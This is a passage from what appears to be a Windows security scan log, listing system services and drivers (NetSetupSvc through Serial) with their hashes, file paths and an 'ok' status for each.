21:37:22.0067 0x1ac0 [ 79C810D49E6D2825F51B0D7CAA6E2FAD, 19B7FB87FC8CE8FEA456F06D32099ED5B69FE38D2954580D4CEC32998D206E9F ] NetSetupSvc C:\WINDOWS\System32\NetSetupSvc.dll
21:37:22.0083 0x1ac0 NetSetupSvc - ok
21:37:22.0083 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetTcpActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:37:22.0099 0x1ac0 NetTcpActivator - ok
21:37:22.0099 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:37:22.0114 0x1ac0 NetTcpPortSharing - ok
21:37:22.0114 0x1ac0 [ 8C03F2F5A9E93AEB08B3AEE51552394A, F95185FB8D5FDEAB39E593488BA6ABCFA9C081BFED05008E0CD95F29B894AFC8 ] netvsc C:\WINDOWS\System32\drivers\netvsc.sys
21:37:22.0130 0x1ac0 netvsc - ok
21:37:22.0255 0x1ac0 [ EB21C7273B46C148329EB3DE48E61946, A8391B69FE02A860DFFC25EF8FC53EC4ED55211C5606DC5C85A4C21A5B4A7820 ] NETwNs64 C:\WINDOWS\System32\drivers\Netwsw02.sys
21:37:22.0427 0x1ac0 NETwNs64 - ok
21:37:22.0645 0x1ac0 [ 93EEA7EDA04968033DBA775A829962A4, 2E0A6772B4D9AE41E172A3239413ED4231B5F94305CE4FCF43193D2A3EFFF53D ] Netwtw04 C:\WINDOWS\system32\DRIVERS\Netwtw04.sys
21:37:22.0794 0x1ac0 Netwtw04 - ok
21:37:22.0809 0x1ac0 [ 0C124EAC0EF7B3767280C94A8C03615B, D10216726A221C8FBC67C47F4B266C271A7C7A4438F77AC44BB561E0A6EB6D34 ] NgcCtnrSvc C:\WINDOWS\System32\NgcCtnrSvc.dll
21:37:22.0841 0x1ac0 NgcCtnrSvc - ok
21:37:22.0856 0x1ac0 [ 9ECFD7DD594DBEAED3A2889045B2DCBD, 984B10A88E304B805153C49B3D618315926635A270AB34D2976E7AA5AE00E2F4 ] NgcSvc C:\WINDOWS\system32\ngcsvc.dll
21:37:22.0919 0x1ac0 NgcSvc - ok
21:37:22.0919 0x1ac0 [ 50F98CD010326B58F09082BACF3123AE, 124446A2905E23BB3F5763E347842F3F511EC44C37C2F85E409F73EC8F53924E ] NlaSvc C:\WINDOWS\System32\nlasvc.dll
21:37:23.0012 0x1ac0 NlaSvc - ok
21:37:23.0028 0x1ac0 [ 6D8F6A9C53CFB0C49E8251A442B7283F, C3E913E4997C35A9B4C2E613A499F01D15264EAB699B93269B690B2A74A70E9A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
21:37:23.0059 0x1ac0 Npfs - ok
21:37:23.0075 0x1ac0 [ BABF7E1757D6908941C9F9CBD66A5EF0, 323E743CB26583763A9C5DE64E7E08138CB8D3E2DE0A8BCE9F774E1C7426E7F8 ] npsvctrig C:\WINDOWS\System32\drivers\npsvctrig.sys
21:37:23.0106 0x1ac0 npsvctrig - ok
21:37:23.0106 0x1ac0 [ A85EB5721C7203AAAAAA04F551960CD9, E61ED728E154799346C749159BFE36FAEB2CE64FC5735F533B910017D66A7EE5 ] nsi C:\WINDOWS\system32\nsisvc.dll
21:37:23.0137 0x1ac0 nsi - ok
21:37:23.0153 0x1ac0 [ 7A6BA778B48DF9FB7AC231D4FF6E3248, 5959CA59C75D2C4DD8A539CAA8D99EF6A0CB5AA3F0D485B14C8B35911748F1F7 ] nsiproxy C:\WINDOWS\system32\drivers\nsiproxy.sys
21:37:23.0169 0x1ac0 nsiproxy - ok
21:37:23.0278 0x1ac0 [ 731FD52461C8107E5B19B9AEDBB82BFB, 51B6722B9B2863B4AE23CE6B1DBD8481DA341748196BD482C6C5F4A6959F24F9 ] NTFS C:\WINDOWS\system32\drivers\NTFS.sys
21:37:23.0356 0x1ac0 NTFS - ok
21:37:23.0356 0x1ac0 [ 4FFB2D5655D10700D5B8E205C4DB86BD, 69078960669A373F9C2D47AF2ED841619831106B681EBAAEAAE5BD569A54CE6D ] Null C:\WINDOWS\system32\drivers\Null.sys
21:37:23.0372 0x1ac0 Null - ok
21:37:23.0372 0x1ac0 [ 99EB6376EC2C03CE5F668577651E3454, A783FFBF89A9074E2074ACAF3F55862DF2F05CAFEAF6A2D509DDA665EB0D59CB ] nvdimmn C:\WINDOWS\System32\drivers\nvdimmn.sys
21:37:23.0387 0x1ac0 nvdimmn - ok
21:37:23.0653 0x1ac0 [ 76F187A361C4005708CB6372B4C43264, 81F1ADA87D2D9647368C2D87C0FFFA52430708A6075C03066C3ADD9EFBE353FF ] nvlddmkm C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys
21:37:23.0981 0x1ac0 nvlddmkm - ok
21:37:23.0997 0x1ac0 [ 3DB2E9E207358BFBD09B77B5119ECA5B, 55FED85EFC06B7AB5031D9986E4E4D2FA8841C549081ABBA9F9D9BBAB7852B37 ] nvraid C:\WINDOWS\system32\drivers\nvraid.sys
21:37:24.0012 0x1ac0 nvraid - ok
21:37:24.0012 0x1ac0 [ 4C04BFBD4DB2EECCC47F5FA39D65BB6E, 9312DC4F7000991946D92D87DD9D37D70E336629EDBA553BFC79804049E34B73 ] nvstor C:\WINDOWS\system32\drivers\nvstor.sys
21:37:24.0028 0x1ac0 nvstor - ok
21:37:24.0059 0x1ac0 [ 85397430F424516BF8300FAAEF929366, 2EDF41407C7483AC8E4703BC0A13F764563E4B00D6923FD4678E6E361AC14D6B ] nvsvc C:\WINDOWS\system32\nvvsvc.exe
21:37:24.0122 0x1ac0 nvsvc - ok
21:37:24.0200 0x1ac0 [ C20A9055FD4372F3773C6F97A8EBA144, 8A241EB402946470B6ADCEBAA3CE6A04E2AD86FC23AA451299C46B4073CEA142 ] NVWMI C:\Windows\system32\nvwmi64.exe
21:37:24.0294 0x1ac0 NVWMI - ok
21:37:24.0309 0x1ac0 [ 0D611DC17E48B6F8DD466A089170D118, E55A78E2CC6A0A5F7B8F0B75DFB2297FBC3B959C4FDEFBEA1C6C4E7706724AEB ] OneSyncSvc C:\WINDOWS\System32\APHostService.dll
21:37:24.0341 0x1ac0 OneSyncSvc - ok
21:37:24.0356 0x1ac0 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] p2pimsvc C:\WINDOWS\system32\pnrpsvc.dll
21:37:24.0403 0x1ac0 p2pimsvc - ok
21:37:24.0419 0x1ac0 [ D1A9C22A98A10EB11A190B8FC7C07C6A, 1DE5F07E707DA9D833F105A8D948BBAEF0172DB2147D9A665EC7320F88D57B9E ] p2psvc C:\WINDOWS\system32\p2psvc.dll
21:37:24.0450 0x1ac0 p2psvc - ok
21:37:24.0466 0x1ac0 [ 2CC6C325B271C7CA60F374F8F868CB45, 569391CA5DF003ED33CAA89FD38834641023C24F7FAE2261F6DA8ABC5CC9C3C9 ] Parport C:\WINDOWS\System32\drivers\parport.sys
21:37:24.0481 0x1ac0 Parport - ok
21:37:24.0497 0x1ac0 [ 664B7DDEE982ADF5EAB480C75B9F6218, 1D1403CBD75916B83EEFA9B235E237583C40025C87C13676247F1EAD3F1D33EE ] partmgr C:\WINDOWS\system32\drivers\partmgr.sys
21:37:24.0569 0x1ac0 partmgr - ok
21:37:24.0581 0x1ac0 [ 72ABB842C15A6C3AC3D954308C6BF206, 8F2A69E3BE43BCD2C8A39153062216B5CCEC9FA62205EC8A23FAB209DFAE7062 ] PcaSvc C:\WINDOWS\System32\pcasvc.dll
21:37:24.0628 0x1ac0 PcaSvc - ok
21:37:24.0659 0x1ac0 [ C5B74C6D87E77BC64DEBD1BF57DEB375, AEBC86E404D4E3985D9FBAD9913AC52127DDE7C79062830717CDFEEA4CD7CC0B ] pci C:\WINDOWS\system32\drivers\pci.sys
21:37:24.0706 0x1ac0 pci - ok
21:37:24.0706 0x1ac0 [ CFB85CB7A6F6926EA0EB96EDFB3C8A91, 7B3A58C165DF231BB202D8A2036272932439864F8EBDC62811E2BEFA8B36FC01 ] pciide C:\WINDOWS\system32\drivers\pciide.sys
21:37:24.0722 0x1ac0 pciide - ok
21:37:24.0722 0x1ac0 [ 13B7D84B397A90E82682C47A15C3A98D, 7F897DA83209381A8C26B34416899E276256AB587DC4E2B60B185CAC8D1877F0 ] pcmcia C:\WINDOWS\system32\drivers\pcmcia.sys
21:37:24.0737 0x1ac0 pcmcia - ok
21:37:24.0753 0x1ac0 [ 76EA512FD9D4673CF7A57775EE8922E2, 6D2B90616A46BC4F9BB6BACBD78EB33C23834987365C87617AFC2E147871C984 ] pcw C:\WINDOWS\system32\drivers\pcw.sys
21:37:24.0753 0x1ac0 pcw - ok
21:37:24.0769 0x1ac0 [ 4A88D29869609A39782EF53145E6F7CA, 6200E0B96FD0289D7F95779723E3CABBDEE17EDE5F802CC51E5539F475711027 ] pdc C:\WINDOWS\system32\drivers\pdc.sys
21:37:24.0784 0x1ac0 pdc - ok
21:37:24.0800 0x1ac0 [ 4F190BA3C9BD2F0277BCBF480F396091, F09613C76350706992B39D7EA9B859D28F00790E5AC17CA7D49C3E270B9D8994 ] PEAUTH C:\WINDOWS\system32\drivers\peauth.sys
21:37:24.0862 0x1ac0 PEAUTH - ok
21:37:24.0909 0x1ac0 [ F5C8E47E2F7B72ACEA49F7AD2EA60D3B, 184B5C91BF36A03257A38E8FB5FDBEF96AE88F0F5FF2EEEAE7BFC6CA15CC1602 ] PeerDistSvc C:\WINDOWS\system32\peerdistsvc.dll
21:37:25.0019 0x1ac0 PeerDistSvc - ok
21:37:25.0019 0x1ac0 [ FE52FF97A094609429FEF098EDC6FB08, 6762ED340048AF61B756CB7B576BE2057768FDB677623D01F2A592727C0E5A00 ] percsas2i C:\WINDOWS\system32\drivers\percsas2i.sys
21:37:25.0034 0x1ac0 percsas2i - ok
21:37:25.0034 0x1ac0 [ FCA143274792F12383C35902E801E83A, 87D93226E32153794993035553C9935D07242631E182460D8ED13650175C0F01 ] percsas3i C:\WINDOWS\system32\drivers\percsas3i.sys
21:37:25.0050 0x1ac0 percsas3i - ok
21:37:25.0081 0x1ac0 [ 4DAD2C73778D41F951B33854936E7BDC, 1421FDA2D083D5923422A038C54603BF798C48DDB7244DBEDA46D537B8CE1534 ] PerfHost C:\WINDOWS\SysWow64\perfhost.exe
21:37:25.0128 0x1ac0 PerfHost - ok
21:37:25.0191 0x1ac0 [ B730E963A31B73938A76D7B80666D60D, FADF452637E2EB50CC8C0E75956FE01F029C587F6EF2F8B347213263DE9D3A80 ] PhoneSvc C:\WINDOWS\System32\PhoneService.dll
21:37:25.0253 0x1ac0 PhoneSvc - ok
21:37:25.0269 0x1ac0 [ 97D85602B8131C487EB08A36F7343F5E, BEDC106AF06358D40BB034390645A5BFF9C138CFD51B5997D32614741D3D2372 ] PimIndexMaintenanceSvc C:\WINDOWS\System32\PimIndexMaintenance.dll
21:37:25.0284 0x1ac0 PimIndexMaintenanceSvc - ok
21:37:25.0316 0x1ac0 [ F9FB601621FF33376F3908C2C27C6EF4, 8689565D4FD1C68826EA0A9C2B44377A2AEC3CD812595F0D32904D8FA5809672 ] pla C:\WINDOWS\system32\pla.dll
21:37:25.0378 0x1ac0 pla - ok
21:37:25.0378 0x1ac0 [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] PlugPlay C:\WINDOWS\system32\umpnpmgr.dll
21:37:25.0394 0x1ac0 PlugPlay - ok
21:37:25.0394 0x1ac0 [ 414CA4DCC31D795882B25ADC1DACE779, AFD8D9AA24C64DD9569FDCBE65171810FE27AF24B8DD2941FECE6245EABB6AAC ] pmem C:\WINDOWS\System32\drivers\pmem.sys
21:37:25.0409 0x1ac0 pmem - ok
21:37:25.0409 0x1ac0 [ D54385DD5A39A5636D1587FC9ECFC337, DEEA5D433CB2DA55AE58C7C5431A1249C94B61606F0A75E4A44D516619060263 ] PNRPAutoReg C:\WINDOWS\system32\pnrpauto.dll
21:37:25.0425 0x1ac0 PNRPAutoReg - ok
21:37:25.0441 0x1ac0 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] PNRPsvc C:\WINDOWS\system32\pnrpsvc.dll
21:37:25.0456 0x1ac0 PNRPsvc - ok
21:37:25.0472 0x1ac0 [ 118E91AEE8F6DDAD088F955498CF2487, F4447C64CF1F36432E0FF09B6712DCE61BF28E3499F20C6C69E80D98B42D671E ] PolicyAgent C:\WINDOWS\System32\ipsecsvc.dll
21:37:25.0487 0x1ac0 PolicyAgent - ok
21:37:25.0503 0x1ac0 [ F6A0B848F75CF55E3980EA0FADCBA317, 11D8B12B4DE867B180965B0F2FD0F362265C518F76FE3351A2B7C9C2FFC5E137 ] Power C:\WINDOWS\system32\umpo.dll
21:37:25.0503 0x1ac0 Power - ok
21:37:25.0519 0x1ac0 [ A39C2177E696BA60B0C5A6A9BCF90D2D, ED70D294B7429ED9ED436B2E98D32D53C76CA23BCB973A0BCA1CD9E5C057EECB ] Power Manager DBC Service C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.EXE
21:37:25.0519 0x1ac0 Power Manager DBC Service - ok
21:37:25.0534 0x1ac0 [ D292D7FADCEE481CC64A9DE8FE9C3347, BD870A375E33CD8434CA97FFE9C2F84E58C6CD0EAEEEE8922172CB01F9674B55 ] PptpMiniport C:\WINDOWS\System32\drivers\raspptp.sys
21:37:25.0550 0x1ac0 PptpMiniport - ok
21:37:25.0597 0x1ac0 [ 5404E7A968A26DF03793B6F68536594D, BE5A85581E87EFE4DB43AD17B8D42D3F7F32364AEEC1416DBB94279C4A203FF2 ] PrintNotify C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll
21:37:25.0800 0x1ac0 PrintNotify - ok
21:37:25.0816 0x1ac0 [ D57CF871B3977731A91FE9611A54C7C1, B6C7F685716A88D0978377B83C5320C88EED0CAA44A001849AAFF71E4E0682E7 ] Processor C:\WINDOWS\System32\drivers\processr.sys
21:37:25.0831 0x1ac0 Processor - ok
21:37:25.0847 0x1ac0 [ 56A7713DE64B16FB309D132E88FDB098, A658C8DCA87442F33B726A9B2060B20393D83B8658D0894C046CAFEAB00E2D8A ] ProfSvc C:\WINDOWS\system32\profsvc.dll
21:37:25.0894 0x1ac0 ProfSvc - ok
21:37:25.0894 0x1ac0 [ B60431D2A046AD97F8427F6E568370F5, CD488E343585A5AC19D9AAF88BF0BB7EEA1BC48F6DA4A4FBF9BE5A04ECF5040B ] Psched C:\WINDOWS\system32\drivers\pacer.sys
21:37:25.0909 0x1ac0 Psched - ok
21:37:25.0909 0x1ac0 [ E0DCCA2A78516D155A6485CCA99F0EA5, EAFD24F815ECD6373BEC8E75B24FB54694CB8E4FF430FB6886F9B5B1C1762BFC ] QWAVE C:\WINDOWS\system32\qwave.dll
21:37:25.0941 0x1ac0 QWAVE - ok
21:37:25.0941 0x1ac0 [ A2B0F46FBA2521E7E732BDBDB1238515, 7F0FEFB09770BF5889D6C2219F68399C962A3F1071E70C4951B6FDAE196CF041 ] QWAVEdrv C:\WINDOWS\system32\drivers\qwavedrv.sys
21:37:25.0956 0x1ac0 QWAVEdrv - ok
21:37:25.0956 0x1ac0 [ EA9EB06EFC325CD2ACF5DF2F26A4894E, 32AC7EDB42CDA736E2AD9AB67795735F16234D9BD80D56FDAE5B8B3C3C1CC26F ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
21:37:25.0972 0x1ac0 RasAcd - ok
21:37:25.0972 0x1ac0 [ 4E9379389D0A851DD19D130C8FAEFBD0, 279A25EF8949A5BAF311CA75493A5F89F74A02711EF875F67D0A95849B409C00 ] RasAgileVpn C:\WINDOWS\System32\drivers\AgileVpn.sys
21:37:26.0003 0x1ac0 RasAgileVpn - ok
21:37:26.0003 0x1ac0 [ 3E8CB44832FE3F96047187291523CDA1, 999A10D4D50CD2C39309FDC04A9F4CB0959BA061AE9305D4DF7F00F37F3813F9 ] RasAuto C:\WINDOWS\System32\rasauto.dll
21:37:26.0019 0x1ac0 RasAuto - ok
21:37:26.0019 0x1ac0 [ 5279EC98F6218D29EADDFECCC0D80E9A, 6F376FC3BEFA9F521635192177962AF1F41173502EC067896B7C2A5FB71E7A3B ] Rasl2tp C:\WINDOWS\System32\drivers\rasl2tp.sys
21:37:26.0050 0x1ac0 Rasl2tp - ok
21:37:26.0066 0x1ac0 [ AC6A0AE3B33EE783717820458882F91C, EA503A90DBC31FB6B5D047D59E0F2855880EF3877877AD576579DB5CD8188E4A ] RasMan C:\WINDOWS\System32\rasmans.dll
21:37:26.0097 0x1ac0 RasMan - ok
21:37:26.0112 0x1ac0 [ D7FF75ED7A48FD60A573C9E959CF4DB5, C67673E2D678527F8C07C9BCC487D385B92282D9D73396CFB01F14F5211CA991 ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
21:37:26.0112 0x1ac0 RasPppoe - ok
21:37:26.0128 0x1ac0 [ 6A4E45A7F17FA0B4B1B48C550E311944, 1E84A559B7AA5F07E8156D223EFFB1B2B43D1E4E90E561D8DF2C257FFBCFDC0D ] RasSstp C:\WINDOWS\System32\drivers\rassstp.sys
21:37:26.0144 0x1ac0 RasSstp - ok
21:37:26.0159 0x1ac0 [ F2C575A9657F7B2E027C6CE7BC8F1A2D, 5D002488CCEDCEBF0542F508FCE47DC9105C67D5685489970048437BD243AC0E ] rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
21:37:26.0175 0x1ac0 rdbss - ok
21:37:26.0175 0x1ac0 [ 9414B22E093243636D362BF8C8C12A67, 575CE91AFADD771CBF86377962EDFAF70150BBA575F8DF144FEE6CC1C0FF88E0 ] rdpbus C:\WINDOWS\System32\drivers\rdpbus.sys
21:37:26.0191 0x1ac0 rdpbus - ok
21:37:26.0191 0x1ac0 [ 53A01D3FDB701AC5D9DDE4140227E3D9, 833AF0BAAB49B58C71C684D2AA20B900C27E19DDCE5E15355C7ABAAB33BC7673 ] RDPDR C:\WINDOWS\system32\drivers\rdpdr.sys
21:37:26.0206 0x1ac0 RDPDR - ok
21:37:26.0222 0x1ac0 [ DF32ED51DC0C3F6F3B1C4CEF71B8B426, DBEAD271B5DE6439E3106BDDB8B1E47D7BA47AE203CF3E1F8924CE02FDCA6E0B ] RdpVideoMiniport C:\WINDOWS\system32\drivers\rdpvideominiport.sys
21:37:26.0222 0x1ac0 RdpVideoMiniport - ok
21:37:26.0237 0x1ac0 [ 2369A5B651308E0C3458143976E9B03B, 0EDE99F7E2A7668E90C2FCA11D4BCE0676FBEA2CCFB57A004827CE5FE96D1584 ] rdyboost C:\WINDOWS\system32\drivers\rdyboost.sys
21:37:26.0237 0x1ac0 rdyboost - ok
21:37:26.0269 0x1ac0 [ 3581FB9529035F8EC6DB681664CA70B1, 0C7BCD6A3B4248683C52B69F0B373D5929C2375F9BBF6CA80C480A8E7446A30C ] ReFS C:\WINDOWS\system32\drivers\ReFS.sys
21:37:26.0331 0x1ac0 ReFS - ok
21:37:26.0347 0x1ac0 [ 79E1ADE19D8B7C56EF29D098EAF57AD0, 295D0F04359A00849759976710F6CB83DB96E5007946930EA19865620EA3EFE7 ] ReFSv1 C:\WINDOWS\system32\drivers\ReFSv1.sys
21:37:26.0394 0x1ac0 ReFSv1 - ok
21:37:26.0394 0x1ac0 [ F08ACE6EF11929E95C624D76E2CFD676, 81A1B4AF6BC1ACFBE16192FAEF55435C4791E49383E765C881B40F1984A3654A ] RegSrvc C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
21:37:26.0409 0x1ac0 RegSrvc - ok
21:37:26.0425 0x1ac0 [ D91C597DE82E1500525945E1FFF24B0F, 3F5837A743715FB2CCBFC9458FBE010AED170B46515925D4C7C59BBAC792F695 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
21:37:26.0456 0x1ac0 RemoteAccess - ok
21:37:26.0456 0x1ac0 [ 19D1072193DAF71C97E5A05FC7673BB3, 313C3762CCC490C20B5561A78E6002E7A52F0142B370F17849DD4AB2F0AF6513 ] RemoteRegistry C:\WINDOWS\system32\regsvc.dll
21:37:26.0472 0x1ac0 RemoteRegistry - ok
21:37:26.0487 0x1ac0 [ A12D167F73C3E285AC623BCA62B3A8BC, 6E8213808C22C0688BD40721FBBBAA88BFEFA1BD304BC19AA015FC541CA5BF84 ] RetailDemo C:\WINDOWS\system32\RDXService.dll
21:37:26.0531 0x1ac0 RetailDemo - ok
21:37:26.0535 0x1ac0 [ 5F44B0167AA65BFFC778227725CB258C, 00027F82639C7E054CF42179A26B5D43FD789C943979EF3F29BC364319A2D306 ] RFCOMM C:\WINDOWS\System32\drivers\rfcomm.sys
21:37:26.0548 0x1ac0 RFCOMM - ok
21:37:26.0548 0x1ac0 [ D31B2CD9458D2E212A5F24D56D2FB8D5, D8EC0BDB9D143C050A48217C57AA1BA6D60EEFEF67A98441064BD8FD339987DD ] RmSvc C:\WINDOWS\System32\RMapi.dll
21:37:26.0579 0x1ac0 RmSvc - ok
21:37:26.0579 0x1ac0 [ C79F1F7C8A5FCBE90E3C833299AA1F59, 7969E79B2095BDA144AA369DE21F49C9FAD272B5864B2F0FD28CB28D148F2AD6 ] RpcEptMapper C:\WINDOWS\System32\RpcEpMap.dll
21:37:26.0594 0x1ac0 RpcEptMapper - ok
21:37:26.0594 0x1ac0 [ 1CE6928C1587F9760F7C3A036786CAE8, 3E4F5371E0DDDBA612BF61891D17D691DCAFB2E1010BBD84737FBD98DA8C03DE ] RpcLocator C:\WINDOWS\system32\locator.exe
21:37:26.0610 0x1ac0 RpcLocator - ok
21:37:26.0657 0x1ac0 [ 0E79A4C76CAAA0CFE9CA42C13E5AA086, C4D90EDA54216CC7897128D39517E4E18195BF28254796C6D0684E2C7DB90642 ] RpcSs C:\WINDOWS\system32\rpcss.dll
21:37:26.0688 0x1ac0 RpcSs - ok
21:37:26.0704 0x1ac0 [ E87EECED9287C275B6CF30EB598B1D77, D0C5D4E37A3FAD422C0ECFFAB53904D9FD5385129DE2BC5AF75D91CD016EA6AC ] rspndr C:\WINDOWS\system32\drivers\rspndr.sys
21:37:26.0719 0x1ac0 rspndr - ok
21:37:26.0735 0x1ac0 [ D1255851605A6FBFC5D740152D7FEEA3, 3780D3CD521176850E080A0541201C43ED9E84E2EC7D355DA317CCA491913194 ] RTSPER C:\WINDOWS\system32\DRIVERS\RtsPer.sys
21:37:26.0751 0x1ac0 RTSPER - ok
21:37:26.0751 0x1ac0 [ 6308366D3CDEA5F427CFF4BCF0081B4E, ABB91A41C09A1607C66BD380FD0A3EECAAF9AD534856CCC78DE1A4E450ADB07F ] s3cap C:\WINDOWS\System32\drivers\vms3cap.sys
21:37:26.0751 0x1ac0 s3cap - ok
21:37:26.0766 0x1ac0 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] SamSs C:\WINDOWS\system32\lsass.exe
21:37:26.0766 0x1ac0 SamSs - ok
21:37:26.0766 0x1ac0 [ 33B2DC5C2F19DA89F862484E23D9833D, 1C3BD1804767D087BE1510EEDCE94FFAC096922C821A123DB1BACDA5777246A7 ] sbp2port C:\WINDOWS\system32\drivers\sbp2port.sys
21:37:26.0782 0x1ac0 sbp2port - ok
21:37:26.0782 0x1ac0 [ 6A7F961E0E6382F185809AEC6A97E078, 434E215337453C3973762A2F10806A57F3B296DDD34A948F781B67E374836AF5 ] SCardSvr C:\WINDOWS\System32\SCardSvr.dll
21:37:26.0829 0x1ac0 SCardSvr - ok
21:37:26.0829 0x1ac0 [ 45B203A8CD642F72E86690B957B6490D, 29D5733D2A6FF9F051FD74FFDCCDB5272EC8E7734021F5BBF0E9E521E61B150F ] ScDeviceEnum C:\WINDOWS\System32\ScDeviceEnum.dll
21:37:26.0876 0x1ac0 ScDeviceEnum - ok
21:37:26.0876 0x1ac0 [ 5CFEEFCC6FAD1FD09ACCFBD652DDD85B, F90104CC42073ACD48A2FCCEDF58B57D8663223406ECB0A270140A053E9260B3 ] scfilter C:\WINDOWS\system32\DRIVERS\scfilter.sys
21:37:26.0907 0x1ac0 scfilter - ok
21:37:26.0938 0x1ac0 [ 5BBFA6CA63E8A5BB8FA2FA84A5562CE2, C74CD0A76473343A8620D26C96F7300026C295EDF61B8A336AB326DFE861678D ] Schedule C:\WINDOWS\system32\schedsvc.dll
21:37:27.0001 0x1ac0 Schedule - ok
21:37:27.0001 0x1ac0 [ 5C8620FAC0E3C1658C8EF7AD7BB7EA5F, FEBE7FC79FCDF692167D82DE54031FD68BD2941544007EEB3D82C21E7F1C5C83 ] scmbus C:\WINDOWS\system32\drivers\scmbus.sys
21:37:27.0016 0x1ac0 scmbus - ok
21:37:27.0016 0x1ac0 [ 0EC94DA356D89CACD89B6E139E4D0A7D, 2F887681FDD5AB787154403E34623B1DFB61C70DAE5E2BFF1565E100F228870B ] SCPolicySvc C:\WINDOWS\System32\certprop.dll
21:37:27.0032 0x1ac0 SCPolicySvc - ok
21:37:27.0048 0x1ac0 [ 71A494A502F24465317E88E80F6C0C2C, D85F139982804B8419D7CCF01F35CCDDA580BA5276A6261D0662028080F7765B ] sdbus C:\WINDOWS\System32\drivers\sdbus.sys
21:37:27.0063 0x1ac0 sdbus - ok
21:37:27.0063 0x1ac0 [ 464B615872981015AC4FEEBDEA83A063, 5CF491352B267241CA11F08E72E6EA668A595662561892E0D02CCA5B71172E14 ] SDFRd C:\WINDOWS\System32\drivers\SDFRd.sys
21:37:27.0079 0x1ac0 SDFRd - ok
21:37:27.0079 0x1ac0 [ 847F01FB8504425BB255856A14278A86, 41997D25D12779CA79551988C56FA0A302367076B09A82F620858EDDDBFCE3FF ] SDRSVC C:\WINDOWS\System32\SDRSVC.dll
21:37:27.0094 0x1ac0 SDRSVC - ok
21:37:27.0110 0x1ac0 [ 6BC219F1D9CDE08CEB9084ADB41FBA01, DA8AC3B42A72515A1976961976203A52D4C8636586EB5EF6B466AAF967A6567E ] sdstor C:\WINDOWS\System32\drivers\sdstor.sys
21:37:27.0110 0x1ac0 sdstor - ok
21:37:27.0126 0x1ac0 [ 2AE8505519C7E8A903DD7BE793A79846, 7044B1BC183E028BCFB544489B033F0968F033696F9816F354329ABD26C6EE7E ] seclogon C:\WINDOWS\system32\seclogon.dll
21:37:27.0141 0x1ac0 seclogon - ok
21:37:27.0157 0x1ac0 [ 112134D19C8F08228D4EC84C16342ED6, F99095458BDD74F1531C4FB7A283D7A3F07BEC33FA8423F26D647EB4C5AAFC2E ] SecurityHealthService C:\WINDOWS\system32\SecurityHealthService.exe
21:37:27.0173 0x1ac0 SecurityHealthService - ok
21:37:27.0219 0x1ac0 [ 77FB9BE8EDDCC999D09F2B1A7878A2A9, 589774C006A339FCA9772C37C9103C73C8592E018553804B97F34E2A0069A3F7 ] SEMgrSvc C:\WINDOWS\system32\SEMgrSvc.dll
21:37:27.0282 0x1ac0 SEMgrSvc - ok
21:37:27.0298 0x1ac0 [ 25456AF499A0C9C4A93CFAC70BDE9CC2, 885C1A9C8BFA73D9C9C454759DF871237F7C0F28D879E98B4BE0D0113C549B09 ] SENS C:\WINDOWS\System32\sens.dll
21:37:27.0313 0x1ac0 SENS - ok
21:37:27.0313 0x1ac0 Sense - ok
21:37:27.0344 0x1ac0 [ 892C955E1081412942F64679E0DD7A5D, 6A28012270FA1FB3BB279102C67FA5296564630181C887E1EA6EA1F952A30C37 ] SensorDataService C:\WINDOWS\System32\SensorDataService.exe
21:37:27.0407 0x1ac0 SensorDataService - ok
21:37:27.0423 0x1ac0 [ 358008CBDE5603F3B56789C977661CE3, 2C81180B27B854F201A683D2C75677660CA54ADC685F86CD414537C60D51FB4A ] SensorService C:\WINDOWS\system32\SensorService.dll
21:37:27.0454 0x1ac0 SensorService - ok
21:37:27.0469 0x1ac0 [ 9B3744C26F206F9F90713D93A93C8B6E, D194F668D8BDDDB4356136CACF1FAD46E7566939C624029EF6E28D7A192B8EBF ] SensrSvc C:\WINDOWS\system32\sensrsvc.dll
21:37:27.0485 0x1ac0 SensrSvc - ok
21:37:27.0485 0x1ac0 [ 585329F62195A4B7AAD0A95F6EC89751, E7ADED97ACA8E8E06C368E24702C22D4C2B0B9495DEA24A2DC2A30782099BDCE ] SerCx C:\WINDOWS\system32\drivers\SerCx.sys
21:37:27.0501 0x1ac0 SerCx - ok
21:37:27.0501 0x1ac0 [ C8F4FDA8B3D039D7947344614FF5BFB2, 1A3B88EC59F2A820AFE4F3AC65F7149EAC68672D1F0D729CBB575694005A8911 ] SerCx2 C:\WINDOWS\system32\drivers\SerCx2.sys
21:37:27.0516 0x1ac0 SerCx2 - ok
21:37:27.0516 0x1ac0 [ E5B450E4E0DC1591254BF9CCF6C57B40, 958E7378D9BDE1F2EBE736D8D9912D56835A606AABDD042443A35CA37EC70F11 ] Serenum C:\WINDOWS\System32\drivers\serenum.sys
21:37:27.0532 0x1ac0 Serenum - ok
21:37:27.0532 0x1ac0 [ 628D8DD136F92316BFEB58FA005338B7, 0CDA673D31F40EBD07E9F67667DB6077F23DCADE2DD8376AB550575224625D44 ] Serial C:\WINDOWS\System32\drivers\serial.sys
21:37:27.0548 0x1ac0 Serial - ok
